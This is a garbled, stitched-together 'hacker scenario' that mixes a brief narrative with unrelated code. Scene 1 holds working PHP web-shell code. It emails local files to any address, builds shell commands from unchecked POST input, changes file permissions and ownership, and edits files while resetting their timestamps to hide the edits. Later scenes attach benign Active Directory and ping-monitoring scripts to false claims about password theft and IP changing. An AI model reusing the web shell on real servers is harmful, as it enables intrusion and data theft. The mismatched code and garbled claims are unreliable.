- Scene 1 - Exploit scenario with incomplete code; the author is himself an unknown hacker.
- {
- $euserinfo = @posix_getpwuid(@posix_geteuid());
- $egroupinfo = @posix_getgrgid(@posix_getegid());
- echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
- }
- else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
- echo ws(3).$dir;
- echo ws(3).'( '.perms(@fileperms($dir)).' )';
- echo "<br>";
- echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
- echo "</b></font>";
- }
- else
- {
- echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
- echo "</td><td>";
- echo "<font face=tahoma size=-2 color=red><b>";
- echo ws(3).@substr(@php_uname(),0,120)."<br>";
- echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
- echo ws(3).@getenv("USERNAME")."<br>";
- echo ws(3).$dir;
- echo "<br>";
- echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
- echo "<br></font>";
- }
- echo "</font>";
- echo "</td></tr></table>";
- if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
- {
- $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
- err(6+$res);
- $_POST['cmd']="";
- }
- if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
- {
- if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
- else
- {
- $filename = @basename($_POST['loc_file']);
- $filedump = @fread($file,@filesize($_POST['loc_file']));
- fclose($file);
- $content_encoding=$mime_type='';
- compress($filename,$filedump,$_POST['compress']);
- $attach = array(
- "name"=>$filename,
- "type"=>$mime_type,
- "content"=>$filedump
- );
- if(empty($_POST['subj'])) { $_POST['subj'] = 'file from Anonymous user'; }
- if(empty($_POST['from'])) { $_POST['from'] = 'hardcore@microsoft.com'; }
- $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
- err(6+$res);
- $_POST['cmd']="";
- }
- }
- if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
- {
- $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
- }
- if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
- {
- switch($_POST['what'])
- {
- case 'own':
- @chown($_POST['param1'],$_POST['param2']);
- break;
- case 'grp':
- @chgrp($_POST['param1'],$_POST['param2']);
- break;
- case 'mod':
- @chmod($_POST['param1'],intval($_POST['param2'], 8));
- break;
- }
- $_POST['cmd']="";
- }
- if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
- {
- switch($_POST['what'])
- {
- case 'file':
- if($_POST['action'] == "create")
- {
- if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
- else {
- fclose($file);
- $_POST['e_name'] = $_POST['mk_name'];
- $_POST['cmd']="edit_file";
- echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
- }
- }
- else if($_POST['action'] == "delete")
- {
- if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
- $_POST['cmd']="";
- }
- break;
- case 'dir':
- if($_POST['action'] == "create"){
- if(mkdir($_POST['mk_name']))
- {
- $_POST['cmd']="";
- echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
- }
- else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
- }
- else if($_POST['action'] == "delete"){
- if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
- $_POST['cmd']="";
- }
- break;
- }
- }
- if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
- {
- if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
- if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
- else {
- echo $table_up3;
- echo $font;
- echo "<form name=save_file method=post>";
- echo ws(3)."<b>".$_POST['e_name']."</b>";
- echo "<div align=center><textarea name=e_text cols=121 rows=24>";
- echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
- fclose($file);
- echo "</textarea>";
- echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
- echo "<input type=hidden name=dir value=".$dir.">";
- echo "<input type=hidden name=cmd value=save_file>";
- echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
- echo "</div>";
- echo "</font>";
- echo "</form>";
- echo "</td></tr></table>";
- exit();
- }
- }
- if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
- {
- $mtime = @filemtime($_POST['e_name']);
- if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
- else {
- if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
- @fwrite($file,$_POST['e_text']);
- @touch($_POST['e_name'],$mtime,$mtime);
- $_POST['cmd']="";
- echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
- }
- }
- if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
- Scene 2 - Once the 'server is pwned', the hacker has access to everything, in other words the database, the list of contacts, clients and personal information. There are many techniques to leverage that access; the most common are SQL attacks, but skilled hackers will look for backdoors and run attacks with APTs and RATs. The first step of an exploit is usually an email that hooks the target with a crafted message and hyperlink, which he opens because the 'spam filter' didn't work and he feels it's okay ()
- Scene 3 - Script to identify active accounts in the target's directory or vulnerable computers in order to steal passwords and login information. The hacker won't need to change the IP address every 30 secs, but he can do so to further exploit the network under his control, although 30 secs is only possible for DDoS attacks. ()
- [CmdletBinding()]
- param(
- [parameter(Mandatory=$TRUE,Position=0)]
- [validateset("NT4","1779","SPN","canonical","GUID","DN","UPN","display","domainSimple","enterpriseSimple","canonicalEx")]
- [String] $OutputType,
- [parameter(Mandatory=$TRUE,Position=1,ValueFromPipeline=$TRUE)]
- [String[]] $Name,
- [validateset("NT4","1779","SPN","canonical","GUID","DN","UPN","display","domainSimple","enterpriseSimple","canonicalEx","SIDorSidHistory","unknown")]
- [String] $InputType="unknown",
- [validateset("domain","server","GC")]
- [String] $InitType="GC",
- [String] $InitName="",
- [Switch] $ChaseReferrals,
- [System.Management.Automation.PSCredential] $Credential
- )
- begin {
- # Hash table to simplify output type names and values
- $OutputNameTypes = @{
- "1779" = 1;
- "DN" = 1;
- "canonical" = 2;
- "NT4" = 3;
- "display" = 4;
- "domainSimple" = 5;
- "enterpriseSimple" = 6;
- "GUID" = 7;
- "UPN" = 9;
- "canonicalEx" = 10;
- "SPN" = 11;
- }
- # Copy output type hash table and add two additional types
- $InputNameTypes = $OutputNameTypes.Clone()
- $InputNameTypes.Add("unknown", 8)
- $InputNameTypes.Add("SIDorSidHistory", 12)
- # Same as with previous hash tables...
- $InitNameTypes = @{
- "domain" = 1;
- "server" = 2;
- "GC" = 3;
- }
- # Accessor functions to simplify calls to NameTranslate
# Late-bound call of a COM method: invokes $method on $object with the given
# $parameters array. The result is emitted only when it is truthy, so a $null
# or empty return produces no pipeline output at all.
function invoke-method([__ComObject] $object, [String] $method, $parameters) {
    $comType = $object.GetType()
    $result = $comType.InvokeMember($method, "InvokeMethod", $NULL, $object, $parameters)
    if ($result) {
        return $result
    }
}
# Late-bound read of the named COM property of $object; the property value is
# the function's output.
function get-property([__ComObject] $object, [String] $property) {
    $comType = $object.GetType()
    return $comType.InvokeMember($property, "GetProperty", $NULL, $object, $NULL)
}
# Late-bound write of the named COM property of $object to $parameters.
# Whatever InvokeMember returns is discarded so the setter emits nothing.
function set-property([__ComObject] $object, [String] $property, $parameters) {
    $comType = $object.GetType()
    $null = $comType.InvokeMember($property, "SetProperty", $NULL, $object, $parameters)
}
- # Create the NameTranslate COM object
- $NameTranslate = new-object -comobject NameTranslate
- # If -Credential, use InitEx to initialize it; otherwise, use Init
- if ( $Credential ) {
- $networkCredential = $Credential.GetNetworkCredential()
- try {
- invoke-method $NameTranslate "InitEx" (
- $InitNameTypes[$InitType],
- $InitName,
- $networkCredential.UserName,
- $networkCredential.Domain,
- $networkCredential.Password
- )
- }
- catch [System.Management.Automation.MethodInvocationException] {
- write-error $_
- exit
- }
- finally {
- remove-variable networkCredential
- }
- }
- else {
- try {
- invoke-method $NameTranslate "Init" (
- $InitNameTypes[$InitType],
- $InitName
- )
- }
- catch [System.Management.Automation.MethodInvocationException] {
- write-error $_
- exit
- }
- }
- # If -ChaseReferrals, set the object's ChaseReferral property to 0x60
- if ( $ChaseReferrals ) {
- set-property $NameTranslate "ChaseReferral" (0x60)
- }
- # The NameTranslate object's Set method specifies the name to translate and
- # its input format, and the Get method returns the name in the output format
# Translates a single name through the shared $NameTranslate COM object
# created in the begin block: "Set" loads $name in the $inputType format,
# "Get" then emits it in the $outputType format. A failing COM call is
# reported as a non-terminating error prefixed with the offending name, so
# one bad input does not stop the rest of the pipeline.
# NOTE(review): the process block invokes this with $name (the whole
# input array) instead of the per-iteration $item; because the parameter is
# typed [String] the array is presumably coerced to one space-joined string
# on every iteration — passing $item looks like the intended call.
function translate-adname2([String] $name, [Int] $inputType, [Int] $outputType) {
    $translator = $NameTranslate
    try {
        invoke-method $translator "Set" @($inputType, $name)
        invoke-method $translator "Get" @($outputType)
    }
    catch [System.Management.Automation.MethodInvocationException] {
        write-error "'$name' - $($_.Exception.InnerException.Message)"
    }
}
- }
- process {
- Foreach($item in $name){
- translate-adname2 $name $InputNameTypes[$InputType] $OutputNameTypes[$OutputType]
- }
- }
- }
- Scene 4 - The hacker is caught once he decides to install this new 'software' from the hacked database; doing so is fine, but he didn't disable automatic updates. Trying to stop it immediately is not enough: he is connected to the Internet, and an inevitable error message was delivered to the IT guy at the email admin@autoupdate-db.com
- He screwed up! This is what he can see on his desktop before panicking ()
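#=== PARAMETERS change them here
# add ip / hostname separated by white space
HOSTS="www.autoupdate-db.com"
# number of ping requests sent to each host
COUNT=40
# email report when
#SUBJECT="Ping failed"
#EMAILID="admin@autoupdate-db.com"
#=== Local vars (do not change them)
# Cron-friendly: automatically change directory to the script's own one.
# The cd is quoted and checked: cron starts in an arbitrary directory, and if
# the cd failed the report file (plwatch.txt) would silently be written there
# instead of next to the script.
cd "$(dirname "$0")" || { echo "$0: cannot cd to the script directory" >&2; exit 1; }
# Current script filename
SCRIPTNAME=$(basename "$0")
# Current date and time
today=$(date '+%Y-%m-%d')
currtime=$(date '+%H:%M:%S')
#=== Help message
# Substring test over all arguments: any argument containing --help prints
# the usage text and exits successfully.
if [[ "$@" =~ "--help" ]]; then
echo "Usage: bash $SCRIPTNAME
Check the rate of packets loss and output the result in a file named plwatch.txt in the same directory as this script.
Note: this script is cron-friendly, so you can add it to a cron job to regularly check your packets loss.
"
exit 0
fi
#=== Main script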
- for myHost in $HOSTS
- do
- msg=$(ping -c $COUNT $myHost | grep 'loss')
- echo "[$today $currtime] ($myHost $COUNT) $msg" >> plwatch.txt
- #count=$(ping -c $COUNT $myHost | grep 'received' | awk -F',' '{ print $2 }' | awk '{ print $1 }')
- #if [ $count -eq 0 ]; then
- # 100% failed
- # echo "Host : $myHost is down (ping failed) at $(date)" | mail -s "$SUBJECT" $EMAILID
- #fi
- Scene 4 - This is what he can see in another window ()
- - - - 8< - - -
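#address=192.168.1.99 # forced bad address
address=83.170.69.51 # www.autoupdate-db.com
internet=1 # default to internet is up

# Scratch file for the last ping output. The original wrote to the fixed path
# /tmp/ping.$ (a literal '$', not the PID), which any local user could
# pre-create or symlink in the shared /tmp; mktemp yields an unpredictable,
# owner-only file and the trap removes it when the loop is interrupted.
ping_out=$(mktemp) || exit 1
trap 'rm -f "$ping_out"' EXIT

while true
do
    # %a Day of Week, textual
    # %b Month, textual, abbreviated
    # %d Day, numeric
    # %r Timestamp AM/PM
    echo -n "$(date +"%a, %b %d, %r") -- "
    # one probe per iteration; the status of ping itself decides up/down
    if ! ping -c 1 "${address}" > "$ping_out"; then
        if [[ ${internet} -eq 1 ]]; then # edge trigger -- was up now down
            echo -n $(say "Internet down") # OSX Text-to-Speech
            echo -n "Internet DOWN"
        else
            echo -n "... still down"
        fi
        internet=0
    else
        if [[ ${internet} -eq 0 ]]; then # edge trigger -- was down now up
            echo -n $(say "Internet back up") # OSX Text-To-Speech
        fi
        internet=1
    fi
    # second line of the ping output (the reply line), or the first line
    # when ping produced only one
    head -n 2 "$ping_out" | tail -n 1
    sleep 30 # poll interval: 30 seconds (the previous comment said 60)
done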
- - - - 8< - - -